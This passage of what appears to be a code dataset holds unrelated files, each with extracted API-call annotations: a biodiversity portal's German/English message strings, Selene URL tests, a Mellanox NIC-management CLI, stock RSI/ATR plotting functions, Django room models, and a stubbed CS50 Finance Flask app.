"Schleswig-Holstein",
"Thüringen"],
'en': ["Europe",
"Baden-Württemberg",
"Bavaria",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hesse",
"Mecklenburg-Vorpommern",
"Lower Saxony",
"North Rhine Westphalia",
"RhinelandPalatinate",
"Saarland",
"Saxony",
"Saxony-Anhalt",
"Schleswig-Holstein",
"Thuringia"]}
messages = {}
messages['results'] = {}
messages['results']['choose_taxa'] = {'de': '- Bitte wählen Sie ein Taxon aus -',
'en': '- Please choose a taxon -'}
messages['results']['choose_states'] = {'de': '- Bitte wählen Sie ein Bundesland aus -',
'en': '- Please choose a state -'}
messages['news_edit'] = {'de': ' Bearbeiten ', 'en': ' Edit '}
messages['news_reset'] = {'de': " Zurücksetzen ", 'en': " Reset "}
messages['news_reset_html'] = {'de': "<h2><strong>Titel</strong></h2><p>Inhalt</p>",
'en': "<h2><strong>Title</strong></h2><p>Content</p>"}
messages['news_message_saved'] = {'de': "News gespeichert!", 'en': "News saved!"}
messages['news_message_updated'] = {'de': "News bearbeitet!", 'en': "News updated!"}
messages['news_message_empty'] = {'de': "Bitte geben Sie Titel und Inhalt des neuen Newsbeitrages ein!",
'en': "Please enter title and content of the news posting!"}
messages['news_cancel'] = {'de': " Abbrechen ", 'en': " Cancel "}
messages['contact'] = {'de': 'Bitte überprüfen Sie die eingegebenen Daten.', 'en': 'Please check the data entered.'}
messages['contact_send'] = {'de': 'Die Mail wurde versandt!', 'en': 'The mail was sent successfully!'}
messages['letter_sender'] = {'de': 'Absender', 'en': 'Sender'}
messages['letter_send_to'] = {'de': 'Empfänger', 'en': 'Send to'}
messages['letter_order_no'] = {'de': 'Auftragsnummer {0}', 'en': 'Order no. {0}'}
messages['letter_no_samples'] = {'de': 'Anzahl Proben: {0}', 'en': 'No. samples: {0}'}
messages['letter_body1'] = {'de': 'Hinweis: Bitte drucken Sie das Anschreiben aus oder notieren Sie alternativ die ',
'en': 'Please print this cover letter or write the'}
messages['letter_body2'] = {'de': 'Auftragsnummer auf einem Zettel und legen diesen dem Probenpaket bei.',
'en': 'order number on a slip and send it together with your parcel '
'containing the samples.'}
messages['pls_select'] = {'de': 'Bitte wählen', 'en': 'Please select'}
messages['wrong_credentials'] = {'de': 'Falscher Benutzer oder Passwort!', 'en': 'Wrong user or password!'}
messages['still_locked'] = {'de': 'Sie wurden noch nicht von einem Koordinator freigeschaltet!',
'en': 'Your account must be unlocked by the Administrator!'}
messages['required_fields'] = {'de': 'Bitte alle Pflichtfelder ausfüllen!',
'en': 'Please fill out all required fields!'}
messages['username_present'] = {'de': 'Nutzername schon vorhanden, bitte wählen Sie einen anderen.',
'en': 'Username already present, please choose another one.'}
messages['user_created'] = {'de': 'Ihre Registrierungsanfrage wird bearbeitet. Sie werden in Kürze eine Email '
                                  'Benachrichtigung zum Stand Ihrer Freigabe für das GBOL Webportal erhalten.',
'en': 'User created. Please wait for unlock of your account by the administrator.'}
messages['reg_exp_mail_subject'] = {'de': 'Ihre Registrierung beim GBOL Webportal',
'en': 'Your Registration at GBOL Webportal'}
messages['reg_exp_mail_body'] = {'de': 'Hallo {salutation} {title} {vorname} {nachname},\n\n'
'wir haben Ihre Registrierung für die taxonomische Expertise {expertisename} '
'erhalten und an die entsprechenden Koordinatoren weitergeleitet.\n\n'
'Viele Grüße\nIhr GBOL Team',
'en': 'Hello {salutation} {title} {vorname} {nachname},\n\n'
                                        'We have received your registration for the taxonomic expertise {expertisename} and '
                                        'have sent it to the corresponding GBOL-taxon coordinators.\n\n'
'Best regards,\nYour GBOL team'}
messages['reg_exp_chg_mail_body'] = {'de': 'Hallo {tk_user},\n\n{req_user} hat sich für die Expertise {expertisename} '
'registriert.\nBitte prüfen Sie die Angaben und zertifizieren die '
'Expertise anschließend.\n\nViele Grüße\nIhr GBOL Team',
'en': 'Hello {tk_user},\n\n{req_user} applies for the taxonomic expertise '
'{expertisename}.\nPlease check the data and approve or decline the request.'
'\n\nBest regards, Your GBOL team'}
messages['reg_exp_accept'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde erfolgreich von einem Koordinator freigegeben.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been approved by the coordinator.
Best regards,
The GBOL Team
"""}
messages['reg_exp_decline'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich bei uns melden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been refused by the coordinator.
If You have any questions regarding the GBOL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['pwd_forgot_email_body'] = {'de': """{0},
eine Anfrage zum Zurücksetzen des Passworts für Ihr Benutzerkonto auf
dem German Barcode of Life Webportal wurde gestellt.
Sie können Ihr Passwort mit einem Klick auf folgenden Link ändern:
http://{1}/sammeln/change-password?link={2}
Ihr Benutzername lautet: {3}
Dieser Link kann nur einmal verwendet werden und leitet Sie zu einer Seite,
auf der Sie ein neues Passwort festlegen können. Er ist einen Tag lang gültig
und läuft automatisch aus, falls Sie ihn nicht verwenden.
Viele Grüße
Das Team von German Barcode of Life""",
'en': """{0},
a request for password reset for your useraccount on the
German Barcode of Life webportal has been posed.
You can change your password with the following link:
http://{1}/sammeln/change-password?link={2}
Your user name is: {3}
Please note: this link can only be used once. The link will direct you to a
website where you can enter a new password.
The link is valid for one day.
Best wishes,
Your team from German Barcode of Life"""}
messages['pwd_forgot_email_subject'] = {'de': 'Neue Login-Daten für {0} auf German Barcode of Life',
'en': 'New login data for your user {0} on German Barcode of '
'Life webportal'}
messages['pwd_forgot_sent'] = {'de': 'Das Passwort und weitere Hinweise wurden an '
'die angegebene Email-Adresse gesendet.',
                               'en': 'The password and further tips were sent to your email address.'}
messages['pwd_forgot_not_found'] = {'de': 'Es wurde kein Benutzer mit eingegebenem Namen bzw. Email gefunden.',
'en': 'No user found with the name or the email entered.'}
messages['pwd_unmatch'] = {'de': 'Die beiden Passwörter stimmen nicht überein.', 'en': 'Passwords do not match.'}
messages['pwd_saved'] = {'de': 'Neues Passwort gespeichert.', 'en': 'New password saved'}
messages['pwd__link_used'] = {'de': 'Link wurde bereits benutzt.', 'en': 'The link has been used already'}
messages['pwd__link_invalid'] = {'de': 'Kein gültiger Link.', 'en': 'Link invalid'}
messages['pwd__link_timeout'] = {'de': 'Link ist nicht mehr gültig.', 'en': 'Link has timed out'}
messages['order_success'] = {'de': 'Danke, Ihre Bestellung wurde entgegengenommen.',
'en': 'Thank You, the order has been received.'}
messages['order_info_missing'] = {'de': 'Bitte füllen Sie alle Felder aus.', 'en': 'Please fill out all fields.'}
messages['edt_no_passwd'] = {'de': 'Bitte geben Sie Ihr Passwort an, um das Benutzerprofil zu ändern.',
'en': 'Please provide your password in order to change the userprofile.'}
messages['edt_passwd_wrong'] = {'de': 'Falsches Passwort.', 'en': 'Wrong password.'}
messages['edt_passwd_mismatch'] = {'de': 'Die beiden neuen Passwörter stimmen nicht überein.',
'en': 'Both new passwords do not match.'}
messages['edt_success'] = {'de': 'Benutzerprofil erfolgreich geändert', 'en': 'Userprofile updated.'}
messages['err_upload'] = {'de': 'Ein Fehler ist beim Hochladen der Sammeltabelle aufgetreten. '
'Bitte schicken Sie Ihre Sammeltabelle per E-Mail an den Taxonkoordinator.',
                          'en': 'An error occurred when uploading the collection sheet. Please send it to the '
'taxon coordinator via e-mail.'}
messages['succ_upload'] = {'de': 'Die Sammeltabelle wurde erfolgreich hochgeladen!',
'en': 'Collection sheet uploaded successfully!'}
messages['download'] = {'de': 'Herunterladen', 'en': 'Download'}
messages['cert'] = {'de': 'zertifiziert', 'en': 'certified'}
messages['subm'] = {'de': 'beantragt', 'en': 'submitted'}
messages['select'] = {'de': 'Auswahl', 'en': 'Please select'}
messages['robot'] = {'de': 'Registrierung konnte nicht durchgeführt werden!', 'en': 'Could not process registration!'}
messages['email_reg_subject'] = {'de': 'GBOL Registrierung', 'en': 'GBOL Registration'}
messages['email_reg_body'] = {'de': """Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde erfolgreich von einem Koordinator freigegeben.
Sie können sich nun im dem Experten-Bereich anmelden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBOL account has been approved by the coordinator.
You can now log in to the expert area.
Best regards,
The GBOL Team
"""}
messages['email_reg_body_decline'] = {'de': """Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich von GBOL bei uns melden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBoL account has been refused by the coordinator.
If You have any questions regarding the GBoL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['states'] = {'de': {'raw': 'Neu', 'cooking': 'in Arbeit', 'done': 'Fertig'},
'en': {'raw': 'New', 'cooking': 'in progress', 'done': 'Done'}}
messages['error'] = {'de': 'Keine Ergebnisse gefunden', 'en': 'Nothing found'}
messages['coord'] = {'de': 'Koordinaten (lat/lon)', 'en': 'Coordinates (lat/lon)'}
messages['taxon'] = {'de': 'Taxon', 'en': 'Higher taxon'}
messages['ncoll'] = {'en': 'Not Collected', 'de': 'Nicht gesammelt'}
messages['nbar'] = {'en': 'No Barcode', 'de': 'Kein Barcode'}
messages['barc'] = {'en': 'Barcode', 'de': 'Barcode'}
messages['pub_updated'] = {'en': 'Publication updated!', 'de': 'Publikation bearbeitet!'}
messages['pub_saved'] = {'en': 'Publication saved!', 'de': 'Publikation gespeichert!'}
messages['pub_error'] = {'en': 'Please enter title and content of the publications posting!',
'de': 'Bitte geben Sie Titel und Inhalt des neuen Publikationsbeitrages ein!'}
messages['mail_req_body'] = """Guten Tag {0},
eine Bestellung für Versandmaterial wurde auf dem GBOL-Portal abgesendet.
Gesendet am {1}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe: {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Absender:
{name}
{street}
{city}
{country}
Email: {email}
"""
# -- In case of an error one of these messages are send to the dev_group specified in production.ini
messages['error'] = {}
messages['error']['order_processing'] = """
Eine Bestellung für Versandmaterial konnte nicht verarbeitet werden:
Bestellzeit: {1}
Koordinator (User-id): {0}
Möglicher Trasaktions-Key: {9}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe (ID): {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Bestellt von:
User-ID: {7}
Name: {8}
Fehler:
{10}
"""
| [
"configparser.ConfigParser"
]
| [((25, 52), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (50, 52), False, 'import configparser\n')] |
# MIT License
#
# Copyright (c) 2015-2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import pytest
from selene import have
from selene.core.exceptions import TimeoutException
start_page = 'file://' + os.path.abspath(os.path.dirname(__file__)) + '/../resources/start_page.html'
def test_have_url(session_browser):
session_browser.open(start_page)
session_browser.should(have.url(session_browser.driver.current_url))
session_browser.should(have.no.url(session_browser.driver.current_url[:-1]))
def test_have_url_containing(session_browser):
session_browser.open(start_page)
session_browser.should(have.url_containing('start_page.html'))
session_browser.should(have.no.url_containing('start_page.xhtml'))
def test_fails_on_timeout_during_waiting_for_exact_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url('xttp:/'))
# TODO: check message too
def test_fails_on_timeout_during_waiting_for_part_of_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url_containing('xttp:/'))
# TODO: check message too
| [
"selene.have.no.url_containing",
"os.path.dirname",
"selene.have.url_containing",
"pytest.raises",
"selene.have.url",
"selene.have.no.url"
]
| [((1414, 1458), 'selene.have.url', 'have.url', (['session_browser.driver.current_url'], {}), '(session_browser.driver.current_url)\n', (1422, 1458), False, 'from selene import have\n'), ((1487, 1539), 'selene.have.no.url', 'have.no.url', (['session_browser.driver.current_url[:-1]'], {}), '(session_browser.driver.current_url[:-1])\n', (1498, 1539), False, 'from selene import have\n'), ((1654, 1692), 'selene.have.url_containing', 'have.url_containing', (['"""start_page.html"""'], {}), "('start_page.html')\n", (1673, 1692), False, 'from selene import have\n'), ((1721, 1763), 'selene.have.no.url_containing', 'have.no.url_containing', (['"""start_page.xhtml"""'], {}), "('start_page.xhtml')\n", (1743, 1763), False, 'from selene import have\n'), ((1929, 1960), 'pytest.raises', 'pytest.raises', (['TimeoutException'], {}), '(TimeoutException)\n', (1942, 1960), False, 'import pytest\n'), ((2205, 2236), 'pytest.raises', 'pytest.raises', (['TimeoutException'], {}), '(TimeoutException)\n', (2218, 2236), False, 'import pytest\n'), ((1251, 1276), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1266, 1276), False, 'import os\n'), ((1985, 2003), 'selene.have.url', 'have.url', (['"""xttp:/"""'], {}), "('xttp:/')\n", (1993, 2003), False, 'from selene import have\n'), ((2261, 2290), 'selene.have.url_containing', 'have.url_containing', (['"""xttp:/"""'], {}), "('xttp:/')\n", (2280, 2290), False, 'from selene import have\n')] |
#!/usr/bin/python
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from networking_mlnx.eswitchd.cli import conn_utils
from networking_mlnx.eswitchd.cli import exceptions
client = conn_utils.ConnUtil()
def parse():
"""Main method that manages supported CLI commands.
    The actions that are supported through the CLI are:
    write-sys, del-port, allocate-port and add-port
    Each action is matched with a method that should handle it,
e.g. write-sys action is matched with write_sys method
"""
parser = argparse.ArgumentParser(prog='ebrctl')
parser.add_argument('action', action='store_true')
parent_parser = argparse.ArgumentParser(add_help=False)
parent_parser.add_argument('vnic_mac')
parent_parser.add_argument('device_id')
parent_parser.add_argument('fabric')
parent_parser.add_argument('vnic_type')
subparsers = parser.add_subparsers()
parser_add_port = subparsers.add_parser('add-port',
parents=[parent_parser])
parser_add_port.add_argument('dev_name')
parser_add_port.set_defaults(func=add_port)
parser_add_port = subparsers.add_parser('allocate-port',
parents=[parent_parser])
parser_add_port.set_defaults(func=allocate_port)
parser_del_port = subparsers.add_parser('del-port')
parser_del_port.set_defaults(func=del_port)
parser_del_port.add_argument('fabric')
parser_del_port.add_argument('vnic_mac')
parser_write_sys = subparsers.add_parser('write-sys')
parser_write_sys.set_defaults(func=write_sys)
parser_write_sys.add_argument('path')
parser_write_sys.add_argument('value')
args = parser.parse_args()
args.func(args)
def allocate_port(args):
try:
dev = client.allocate_nic(args.vnic_mac, args.device_id,
args.fabric, args.vnic_type)
except exceptions.MlxException as e:
sys.stderr.write("Error in allocate command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def add_port(args):
try:
dev = client.plug_nic(args.vnic_mac, args.device_id, args.fabric,
args.vnic_type, args.dev_name)
except exceptions.MlxException as e:
sys.stderr.write("Error in add-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def del_port(args):
try:
client.deallocate_nic(args.vnic_mac, args.fabric)
except exceptions.MlxException as e:
sys.stderr.write("Error in del-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def write_sys(args):
try:
fd = open(args.path, 'w')
fd.write(args.value)
fd.close()
except Exception as e:
sys.stderr.write("Error in write-sys command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def main():
parse()
| [
"argparse.ArgumentParser",
"networking_mlnx.eswitchd.cli.conn_utils.ConnUtil",
"sys.stderr.write",
"sys.exit",
"sys.stdout.write"
]
| [((752, 773), 'networking_mlnx.eswitchd.cli.conn_utils.ConnUtil', 'conn_utils.ConnUtil', ([], {}), '()\n', (771, 773), False, 'from networking_mlnx.eswitchd.cli import conn_utils\n'), ((1098, 1136), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""ebrctl"""'}), "(prog='ebrctl')\n", (1121, 1136), False, 'import argparse\n'), ((1213, 1252), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'add_help': '(False)'}), '(add_help=False)\n', (1236, 1252), False, 'import argparse\n'), ((2627, 2648), 'sys.stdout.write', 'sys.stdout.write', (['dev'], {}), '(dev)\n', (2643, 2648), False, 'import sys\n'), ((2653, 2664), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (2661, 2664), False, 'import sys\n'), ((2987, 3008), 'sys.stdout.write', 'sys.stdout.write', (['dev'], {}), '(dev)\n', (3003, 3008), False, 'import sys\n'), ((3013, 3024), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3021, 3024), False, 'import sys\n'), ((3269, 3280), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3277, 3280), False, 'import sys\n'), ((3537, 3548), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3545, 3548), False, 'import sys\n'), ((2521, 2566), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in allocate command"""'], {}), "('Error in allocate command')\n", (2537, 2566), False, 'import sys\n'), ((2575, 2602), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (2591, 2602), False, 'import sys\n'), ((2611, 2622), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2619, 2622), False, 'import sys\n'), ((2881, 2926), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in add-port command"""'], {}), "('Error in add-port command')\n", (2897, 2926), False, 'import sys\n'), ((2935, 2962), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (2951, 2962), False, 'import sys\n'), ((2971, 2982), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2979, 2982), False, 'import sys\n'), ((3163, 3208), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in del-port command"""'], {}), "('Error in del-port command')\n", (3179, 3208), False, 'import sys\n'), ((3217, 3244), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (3233, 3244), False, 'import sys\n'), ((3253, 3264), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3261, 3264), False, 'import sys\n'), ((3430, 3476), 'sys.stderr.write', 'sys.stderr.write', (['"""Error in write-sys command"""'], {}), "('Error in write-sys command')\n", (3446, 3476), False, 'import sys\n'), ((3485, 3512), 'sys.stderr.write', 'sys.stderr.write', (['e.message'], {}), '(e.message)\n', (3501, 3512), False, 'import sys\n'), ((3521, 3532), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3529, 3532), False, 'import sys\n')] |
from typing import List, Union
import numpy as np
import pandas_datareader as pdr
import pandas as pd
import matplotlib.pyplot as plt
def rsi(symbol :str ,name :str, date :str) -> None :
"""
    Calculates and visualises the Relative Strength Index (RSI) for a stock of the company.
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
name(str) : Name of the company
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
rsi('GOOG','Google','2020,01,01')
"""
    ticker : pd.DataFrame = pdr.get_data_yahoo(symbol, date)
    delta : pd.Series = ticker['Close'].diff()
    up : pd.Series = delta.clip(lower=0)
    down : pd.Series = -1*delta.clip(upper=0)
    ema_up : pd.Series = up.ewm(com=13, adjust=False).mean()
    ema_down : pd.Series = down.ewm(com=13, adjust=False).mean()
    rs : pd.Series = ema_up/ema_down
    ticker['RSI'] = 100 - (100/(1 + rs))
    ticker = ticker.iloc[14:]
print(ticker)
fig, (ax1, ax2) = plt.subplots(2)
ax1.get_xaxis().set_visible(False)
fig.suptitle(name)
ticker['Close'].plot(ax=ax1)
ax1.set_ylabel('Price ($)')
ticker['RSI'].plot(ax=ax2)
ax2.set_ylim(0,100)
ax2.axhline(30, color='r', linestyle='--')
ax2.axhline(70, color='r', linestyle='--')
ax2.set_ylabel('RSI')
plt.show()
def volatility(symbol :str, date :str) ->None:
"""
    Measures and visualizes the Volatility of a Stock by calculating the Average True Range (ATR)
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
volatility('GOOG','2020,01,01')
"""
    data : pd.DataFrame = pdr.get_data_yahoo(symbol,date)
    data.head()
    high_low : pd.Series = data['High'] - data['Low']
    high_cp : pd.Series = np.abs(data['High'] - data['Close'].shift())
    low_cp : pd.Series = np.abs(data['Low'] - data['Close'].shift())
    df : pd.DataFrame = pd.concat([high_low, high_cp, low_cp], axis=1)
    true_range : pd.Series = np.max(df, axis=1)
    average_true_range : pd.Series = true_range.rolling(14).mean()
average_true_range
true_range.rolling(14).sum()/14
fig, ax = plt.subplots()
average_true_range.plot(ax=ax)
    ax2 = data['Close'].plot(ax=ax, secondary_y=True, alpha=.3)
ax.set_ylabel("ATR")
ax2.set_ylabel("Price")
plt.show() | [
"pandas_datareader.get_data_yahoo",
"numpy.max",
"pandas.concat",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show"
]
| [((620, 652), 'pandas_datareader.get_data_yahoo', 'pdr.get_data_yahoo', (['symbol', 'date'], {}), '(symbol, date)\n', (638, 652), True, 'import pandas_datareader as pdr\n'), ((1072, 1087), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)'], {}), '(2)\n', (1084, 1087), True, 'import matplotlib.pyplot as plt\n'), ((1394, 1404), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1402, 1404), True, 'import matplotlib.pyplot as plt\n'), ((1865, 1897), 'pandas_datareader.get_data_yahoo', 'pdr.get_data_yahoo', (['symbol', 'date'], {}), '(symbol, date)\n', (1883, 1897), True, 'import pandas_datareader as pdr\n'), ((2137, 2183), 'pandas.concat', 'pd.concat', (['[high_low, high_cp, low_cp]'], {'axis': '(1)'}), '([high_low, high_cp, low_cp], axis=1)\n', (2146, 2183), True, 'import pandas as pd\n'), ((2208, 2226), 'numpy.max', 'np.max', (['df'], {'axis': '(1)'}), '(df, axis=1)\n', (2214, 2226), True, 'import numpy as np\n'), ((2367, 2381), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (2379, 2381), True, 'import matplotlib.pyplot as plt\n'), ((2557, 2567), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2565, 2567), True, 'import matplotlib.pyplot as plt\n')] |
from django.db import models
class Room(models.Model):
code = models.CharField('Code', max_length=128)
tab_url = models.CharField('Tab url', max_length=512, default='', blank=True)
def to_dict(self):
return {
'users': [u.to_dict() for u in self.users.all()],
'tabUrl': self.tab_url
}
def __str__(self):
return f'Room {self.code}'
class RoomUser(models.Model):
room = models.ForeignKey(Room, related_name='users', on_delete=models.CASCADE)
username = models.CharField('Username', max_length=128, default="user")
host = models.BooleanField('Is host')
def to_dict(self):
return {
'id': self.id,
'username': self.username,
'isHost': self.host,
}
def __str__(self):
return f'{self.username} ({self.id})'
| [
"django.db.models.CharField",
"django.db.models.BooleanField",
"django.db.models.ForeignKey"
]
| [((68, 108), 'django.db.models.CharField', 'models.CharField', (['"""Code"""'], {'max_length': '(128)'}), "('Code', max_length=128)\n", (84, 108), False, 'from django.db import models\n'), ((123, 190), 'django.db.models.CharField', 'models.CharField', (['"""Tab url"""'], {'max_length': '(512)', 'default': '""""""', 'blank': '(True)'}), "('Tab url', max_length=512, default='', blank=True)\n", (139, 190), False, 'from django.db import models\n'), ((441, 512), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Room'], {'related_name': '"""users"""', 'on_delete': 'models.CASCADE'}), "(Room, related_name='users', on_delete=models.CASCADE)\n", (458, 512), False, 'from django.db import models\n'), ((529, 589), 'django.db.models.CharField', 'models.CharField', (['"""Username"""'], {'max_length': '(128)', 'default': '"""user"""'}), "('Username', max_length=128, default='user')\n", (545, 589), False, 'from django.db import models\n'), ((601, 631), 'django.db.models.BooleanField', 'models.BooleanField', (['"""Is host"""'], {}), "('Is host')\n", (620, 631), False, 'from django.db import models\n')] |
import torch
DEVICE = torch.device("cuda")
SAVED_CHECKPOINTS = [32*1000, 100*1000, 150*1000, 200*1000, 300*1000, 400*1000]
SAVED_CHECKPOINTS += [10*1000, 20*1000, 30*1000, 40*1000, 50*1000, 60*1000, 70*1000, 80*1000, 90*1000]
SAVED_CHECKPOINTS += [25*1000, 50*1000, 75*1000]
SAVED_CHECKPOINTS = set(SAVED_CHECKPOINTS)
| [
"torch.device"
]
| [((23, 43), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (35, 43), False, 'import torch\n')] |
import os
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from helpers import apology, login_required, lookup, usd
# Configure application
app = Flask(__name__)
# Ensure templates are auto-reloaded
app.config["TEMPLATES_AUTO_RELOAD"] = True
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Custom filter
app.jinja_env.filters["usd"] = usd
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# Configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
# Make sure API key is set
if not os.environ.get("API_KEY"):
raise RuntimeError("API_KEY not set")
@app.route("/")
@login_required
def index():
"""Show portfolio of stocks"""
return apology("TODO")
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock"""
return apology("TODO")
@app.route("/history")
@login_required
def history():
"""Show history of transactions"""
return apology("TODO")
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username", 403)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 403)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = ?", request.form.get("username"))
# Ensure username exists and password is correct
if len(rows) != 1 or not check_password_hash(rows[0]["hash"], request.form.get("password")):
return apology("invalid username and/or password", 403)
# Remember which user has logged in
session["user_id"] = rows[0]["id"]
# Redirect user to home page
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("login.html")
@app.route("/logout")
def logout():
"""Log user out"""
# Forget any user_id
session.clear()
# Redirect user to login form
return redirect("/")
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
"""Get stock quote."""
return apology("TODO")
@app.route("/register", methods=["GET", "POST"])
def register():
"""Register user"""
return apology("TODO")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
"""Sell shares of stock"""
return apology("TODO")
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
# Listen for errors
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
| [
"flask.render_template",
"flask.Flask",
"cs50.SQL",
"os.environ.get",
"flask_session.Session",
"werkzeug.exceptions.InternalServerError",
"flask.redirect",
"helpers.apology",
"flask.request.form.get",
"tempfile.mkdtemp",
"flask.session.clear"
]
